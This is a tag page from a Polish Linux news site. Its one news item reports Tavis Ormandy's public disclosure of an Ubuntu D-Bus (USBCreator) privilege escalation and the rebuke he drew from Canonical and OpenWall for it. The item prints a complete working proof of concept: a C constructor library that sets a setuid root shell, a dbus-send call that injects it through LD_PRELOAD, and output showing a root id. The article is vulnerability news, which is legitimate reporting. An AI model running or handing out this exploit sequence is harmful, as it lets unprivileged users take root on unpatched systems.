Tags Posts tagged with "d-bus"

d-bus

przez -
13 3060
Security - bezpieczeństwo

Na liście dyskusyjnej OSS Security, Tavis Ormandy opublikował przykładowy kod exploita, który umożliwia uzyskanie praw roota na czystej instalacji systemu Ubuntu. Błąd znajduje się w usłudze D-Bus. Okazuje się także, że autor otrzymał ostrą reprymendę od Seth Arnold i Marc Deslauriers z Canonical oraz Solar Designer z OpenWall za publiczne ujawnienie tego typu podatności. Według założeń polityki bezpieczeństwa firmy Canonical, tego typu luki posiadają wysoki priorytet i są objęte embargiem tajności. Kurt Seifried z Red Hata oznajmił także, że będzie omawiał osobiście błąd i ewentualne poprawki z Tavisem Ormandy.

Poniżej przykładowy exploit:

$ cat > test.c
void __attribute__((constructor)) init (void)
{
chown("/tmp/test", 0, 0);
chmod("/tmp/test", 04755);
}
^D
$ gcc -shared -fPIC -o /tmp/test.so test.c
$ cp /bin/sh /tmp/test
$ dbus-send --print-reply --system --dest=com.ubuntu.USBCreator
/com/ubuntu/USBCreator com.ubuntu.USBCreator.KVMTest string:/dev/sda
dict:string:string:DISPLAY,"foo",XAUTHORITY,"foo",LD_PRELOAD,"/tmp/test.so"
method return sender=:1.4364 -> dest=:1.7427 reply_serial=2
$ ls -l /tmp/test
-rwsr-xr-x 1 root root 121272 Apr 22 16:43 /tmp/test
$ /tmp/test
# id
euid=0(root) groups=0(root)

Warto zapoznać się z całym tematem na liście dyskusyjnej.

Polecane

Prasa, Czasopismo

1 894
Ukazało się Linux Magazine – numer 161. Lipcowe wydanie magazynu zawiera analizę tworzenia bardziej czytelnych wyrażeń regularnych z Simple Regex Language, instrukcje zabezpieczania i...